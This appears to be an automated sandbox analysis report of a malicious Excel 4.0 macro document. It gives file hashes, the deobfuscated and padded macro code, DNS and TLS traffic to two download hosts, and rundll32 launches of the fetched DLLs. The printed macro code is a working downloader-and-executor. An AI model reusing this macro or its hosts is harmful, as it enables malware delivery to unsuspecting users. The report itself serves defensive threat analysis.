File Type: Microsoft Cabinet archive data, 59863 bytes, 1 file
Category: dropped
Size (bytes): 59863
Entropy (8bit): 7.99556910241083
Encrypted: true
SSDEEP: 1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
MD5: 15775D95513782F99CDFB17E65DFCEB1
SHA1: 6C11F8BEE799B093F9FF4841E31041B081B23388
SHA-256: 477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
SHA-512: AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
Malicious: false
Reputation: moderate, very likely benign file
                                                                          Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
C:\Users\user\AppData\Local\Temp\TarE820.tmp
Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type: data
Category: dropped
Size (bytes): 156386
Entropy (8bit): 6.3086528024913715
Encrypted: false
SSDEEP: 1536:ZlI6c79JjgCyrYBWsWimp4Ydm6Caku2SWsz0OD8reJgMnl3XlMyGr:ZBUJcCyZfdmoku2SL3kMnBGyA
MD5: 78CABD9F1AFFF17BB91A105CF4702188
SHA1: 52FA8144D1FC5F92DEB45E53F076BCC69F5D8CC7
SHA-256: C7B6743B228E40B19443E471081A51041974801D325DB4ED8FD73A1A24CBD066
SHA-512: F0BF5DFBAB47CC6A3D1BF03CEC3FDDA84537DB756DA97E6D93CF08A5C750EABDFBF7FCF7EBDFFF04326617E43F0D767E5A2B7B68C548C6D9C48F36493881F62B
Malicious: false
Reputation: moderate, very likely benign file
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\85095f36_by_Libranalysis.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu May 13 03:06:28 2021, mtime=Thu May 13 03:06:41 2021, atime=Thu May 13 03:06:42 2021, length=174080, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2168
                                                                          Entropy (8bit):4.55358465593507
                                                                          Encrypted:false
                                                                          SSDEEP:48:8l/XT0jSi0mOE+3MsNIOE6NQh2l/XT0jSi0mOE+3MsNIOE6NQ/:8l/Xojj0mF5sNIF6NQh2l/Xojj0mF5sq
                                                                          MD5:EC9DDED0140ED345A0E920ED384B589E
                                                                          SHA1:5D544EB2146A0F1ACF43014AC0C77A53A38C199E
                                                                          SHA-256:0C48FCC306D5B68924766143CEFFA69C49486E21C875D043AEBF23C79AB56FB5
                                                                          SHA-512:CBF696C2D8ACCAE77AF5CA8425D0CF6018EE03EEEAAB1776A171E3ABCCBA61B977AC3EE49C28723C7413161B0CAC3EBE9F06A882A5C0AC707EAB5674F40858F4
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu May 13 03:06:41 2021, atime=Thu May 13 03:06:41 2021, length=8192, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):867
                                                                          Entropy (8bit):4.48855128561899
                                                                          Encrypted:false
                                                                          SSDEEP:12:85QgXsLgXg/XAlCPCHaXtB8XzB/WPzX+WnicvbCLbDtZ3YilMMEpxRljKATdJP9O:851Xa/XTd6jELYeWXDv3qNrNru/
                                                                          MD5:3873FC762AD93C6502E6782085257395
                                                                          SHA1:C658594B739C74F8EEE4E83E8A5627DF2845B638
                                                                          SHA-256:741B59795C96A82A454B86B8CCDBB864EB7977C5E7B68710FCBAB4EB5F02E832
                                                                          SHA-512:AFCF1569C8B8B58619F737B8B3CD9BB870731B1C1AD6C28C8E1DC1AD7D0667A071F305D5DB683F0E299083F9FAFCA5D41F9569A63E83C157BD20DE3439E2F331
                                                                          Malicious:false
                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):125
                                                                          Entropy (8bit):4.767349509094217
                                                                          Encrypted:false
                                                                          SSDEEP:3:oyBVomMFQViCGUwSLMp6luiCGUwSLMp6lmMFQViCGUwSLMp6lv:dj6FQsChNeiChNbFQsChNf
                                                                          MD5:C0B02E4E038B4F90480805B482DBDAE3
                                                                          SHA1:00B679F4AC18AFFB01A6398466F4E00C6D8B05B2
                                                                          SHA-256:8BAEB94B3746C2918D49060B37CDC1D0A232328698CC99790499356711D43CB7
                                                                          SHA-512:601165E1D352E8D280C8E50684D28EF8091CE3CBD24E4AE5407030D1C3E543FF78C30107949A40EB3179D9D7BB265CA422C307D04C4DF74AEE0F8603FEC2762D
                                                                          Malicious:false
                                                                          Preview: Desktop.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..85095f36_by_Libranalysis.LNK=0..[xls]..85095f36_by_Libranalysis.LNK=0..
                                                                          C:\Users\user\Desktop\9DDE0000
                                                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                          File Type:Applesoft BASIC program data, first line number 16
                                                                          Category:dropped
                                                                          Size (bytes):205059
                                                                          Entropy (8bit):5.64434473883402
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3l8ifPSD8YNoTU90nGoPzn3brX7vrPlsrXvLJGnLrl8iNu:rfPTrTU9GuoNu
                                                                          MD5:B4F9E8030E94C8955737359892D3A4E5
                                                                          SHA1:8B2E0D0B905439A8A6F139499FBC015FB17370FE
                                                                          SHA-256:9908BE889A6E9645414AAC9E3FADEA5A26183628BECC92F35B1B7A3103E2D56A
                                                                          SHA-512:E41DF82B7F6EFBAB90BE0212173EF54E2A0F1AD1C9990E460789114396D5558FB11AA954022E21FE348F31BDBF6857E3B6022D00B93EB08F5C9DC590655EAAA4
                                                                          Malicious:false

                                                                          Static File Info

                                                                          General

                                                                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: van-van, Last Saved By: vi-vi, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed May 12 08:24:11 2021, Security: 0
                                                                          Entropy (8bit):3.258986427712615
                                                                          TrID:
                                                                          • Microsoft Excel sheet (30009/1) 78.94%
                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                          File name:85095f36_by_Libranalysis.xls
                                                                          File size:375808
                                                                          MD5:85095f36d19d0a0cc635a9e255730ea0
                                                                          SHA1:8ec5f0d784134f08bce52949027a686cd099acd8
                                                                          SHA256:a4a5606ff24d70f51f72a501a370ab2199548d4d3a88e904cb9cfafb824d8af2
                                                                          SHA512:b95d86d75bc04d974061657cc4183c117f3a6b88ea21fb3d7e30ce1631bd8cd92928990954d9bf669d68a16b7748ca7d43246abd445fddbd29e898720c7d14d1
                                                                          SSDEEP:3072:Q8UGHv2tt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/I/T/tbHm7H9G4l+s2k3zN4sbc9:vUGAt6Uqa5DPdG9uS9QLp4l+s+I8

                                                                          File Icon

                                                                          Icon Hash:e4eea286a4b4bcb4

                                                                          Static OLE Info

                                                                          General

                                                                          Document Type:OLE
                                                                          Number of OLE Files:1

                                                                          OLE File "85095f36_by_Libranalysis.xls"

                                                                          Indicators

                                                                          Has Summary Info:True
                                                                          Application Name:Microsoft Excel
                                                                          Encrypted Document:False
                                                                          Contains Word Document Stream:False
                                                                          Contains Workbook/Book Stream:True
                                                                          Contains PowerPoint Document Stream:False
                                                                          Contains Visio Document Stream:False
                                                                          Contains ObjectPool Stream:
                                                                          Flash Objects Count:
                                                                          Contains VBA Macros:True

                                                                          Summary

                                                                          Code Page:1251
                                                                          Author:van-van
                                                                          Last Saved By:vi-vi
                                                                          Create Time:2006-09-16 00:00:00
                                                                          Last Saved Time:2021-05-12 07:24:11
                                                                          Creating Application:Microsoft Excel
                                                                          Security:0

                                                                          Document Summary

                                                                          Document Code Page:1251
                                                                          Thumbnail Scaling Desired:False
                                                                          Contains Dirty Links:False

                                                                          Streams

                                                                          Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5DocumentSummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.287037498961
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                          General
                                                                          Stream Path:\x5SummaryInformation
                                                                          File Type:data
                                                                          Stream Size:4096
                                                                          Entropy:0.290777742057
                                                                          Base64 Encoded:False
                                                                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . v i - v i . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                          Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 363283
                                                                          General
                                                                          Stream Path:Book
                                                                          File Type:Applesoft BASIC program data, first line number 8
                                                                          Stream Size:363283
                                                                          Entropy:3.24522262131
                                                                          Base64 Encoded:True
                                                                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . v i - v i B . . . . . . . . . . . . . . . . . . . . . . . D o c 3 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .

                                                                          Macro 4.0 Code

                                                                          CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&"1",0,!AL21)=RUN(Doc4!AM6)
                                                                          
                                                                          ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ39&BA39&before.3.5.0.sheet!BB39&before.3.5.0.sheet!BC39,before.3.5.0.sheet!AU13)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAN
D()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(before.3.5.0.sheet!AZ40&BA40&before.3.5.0.sheet!BB40&before.3.5.0.sheet!BC40,before.3.5.0.sheet!AU14)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=FORMULA(""
U""&before.3.5.0.sheet!BC25&before.3.5.0.sheet!BC29&before.3.5.0.sheet!BF28&before.3.5.0.sheet!BC28&before.3.5.0.sheet!BC31&before.3.5.0.sheet!BF29&""A"",before.3.5.0.she
                                                                          "=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU13,Doc3!BC17,0,!AL21)=CALL(Doc3!AU10,Doc3!AU11,Doc3!AU12,0,Doc3!AU14,Doc3!BC18&""1"",0,!AL21)=RUN(Doc4!AM6)"
                                                                          "=MDETERM(56241452475)=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC17&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=EXEC(Doc3!BB22&Doc3!BB23&Doc3!BB24&Doc3!BB30&""2 ""&Doc3!BC18&""1""&Doc3!BD31&""lRegi""&""ster""&""Ser""&""ver"")=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=MDETERM(56241452475)=RUN(Doc3!AY22)"

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                                                          May 12, 2021 21:06:27.197551012 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:27.356185913 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.356297016 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:27.386086941 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:27.546911955 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.560975075 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.561023951 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.561058044 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.561161041 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:27.599241018 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:27.767267942 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:27.767497063 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:29.417469978 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:29.617268085 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:30.020272970 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:30.020450115 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:30.020714998 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:30.020792007 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:30.020813942 CEST  49165        443        192.168.2.22    192.185.39.58
                                                                          May 12, 2021 21:06:30.119555950 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.179385900 CEST  443          49165      192.185.39.58   192.168.2.22
                                                                          May 12, 2021 21:06:30.284921885 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.285065889 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.286072969 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.447608948 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.461158037 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.461186886 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.461199999 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.461394072 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.514415979 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.687272072 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:30.687468052 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.727348089 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:30.930167913 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:31.299655914 CEST  443          49168      192.185.32.232  192.168.2.22
                                                                          May 12, 2021 21:06:31.299815893 CEST  49168        443        192.168.2.22    192.185.32.232
                                                                          May 12, 2021 21:06:31.300182104 CEST44349168192.185.32.232192.168.2.22
                                                                          May 12, 2021 21:06:31.300261974 CEST49168443192.168.2.22192.185.32.232
                                                                          May 12, 2021 21:07:01.300415993 CEST44349168192.185.32.232192.168.2.22

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP     Dest IP
May 12, 2021 21:06:27.110641003 CEST  52197        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:27.171176910 CEST  53           52197      8.8.8.8       192.168.2.22
May 12, 2021 21:06:28.180880070 CEST  53099        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:28.229871035 CEST  53           53099      8.8.8.8       192.168.2.22
May 12, 2021 21:06:28.241209030 CEST  52838        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:28.291661024 CEST  53           52838      8.8.8.8       192.168.2.22
May 12, 2021 21:06:28.827760935 CEST  61200        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:28.888394117 CEST  53           61200      8.8.8.8       192.168.2.22
May 12, 2021 21:06:28.900585890 CEST  49548        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:28.963512897 CEST  53           49548      8.8.8.8       192.168.2.22
May 12, 2021 21:06:30.056551933 CEST  55627        53         192.168.2.22  8.8.8.8
May 12, 2021 21:06:30.116555929 CEST  53           55627      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                             Source IP     Dest IP  Trans ID  OP Code             Name                   Type            Class
May 12, 2021 21:06:27.110641003 CEST  192.168.2.22  8.8.8.8  0x9610    Standard query (0)  signifysystem.com      A (IP address)  IN (0x0001)
May 12, 2021 21:06:30.056551933 CEST  192.168.2.22  8.8.8.8  0x246e    Standard query (0)  fcventasyservicios.cl  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                             Source IP  Dest IP       Trans ID  Reply Code    Name                   CName  Address         Type            Class
May 12, 2021 21:06:27.171176910 CEST  8.8.8.8    192.168.2.22  0x9610    No error (0)  signifysystem.com      -      192.185.39.58   A (IP address)  IN (0x0001)
May 12, 2021 21:06:30.116555929 CEST  8.8.8.8    192.168.2.22  0x246e    No error (0)  fcventasyservicios.cl  -      192.185.32.232  A (IP address)  IN (0x0001)

HTTPS Packets

Timestamp                             Source IP       Source Port  Dest IP       Dest Port  Subject                          Issuer                                            Not Before                     Not After
May 12, 2021 21:06:27.561058044 CEST  192.185.39.58   443          192.168.2.22  49165      CN=cpcontacts.signifysystem.com  CN=R3, O=Let's Encrypt, C=US                      Thu Apr 01 17:00:25 CEST 2021  Wed Jun 30 17:00:25 CEST 2021
  (chain)                                                                                   CN=R3, O=Let's Encrypt, C=US     CN=DST Root CA X3, O=Digital Signature Trust Co.  Wed Oct 07 21:21:40 CEST 2020  Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

May 12, 2021 21:06:30.461199999 CEST  192.185.32.232  443          192.168.2.22  49168      CN=mail.fcventasyservicios.cl    CN=R3, O=Let's Encrypt, C=US                      Tue Mar 16 13:01:12 CET 2021   Mon Jun 14 14:01:12 CEST 2021
  (chain)                                                                                   CN=R3, O=Let's Encrypt, C=US     CN=DST Root CA X3, O=Digital Signature Trust Co.  Wed Oct 07 21:21:40 CEST 2020  Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL Client Fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL Client Digest: 7dcce5b76c8b17472d024758970a406b

Code Manipulations

Statistics

CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior (per-process charts)

System Behavior

General

Start time: 21:06:39
Start date: 12/05/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fbc0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:06:46
Start date: 12/05/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\ritofm.cvm,DllRegisterServer
Imagebase: 0xff1b0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 21:06:47
Start date: 12/05/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32 ..\ritofm.cvm1,DllRegisterServer
Imagebase: 0xff1b0000
File size: 45568 bytes
MD5 hash: DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis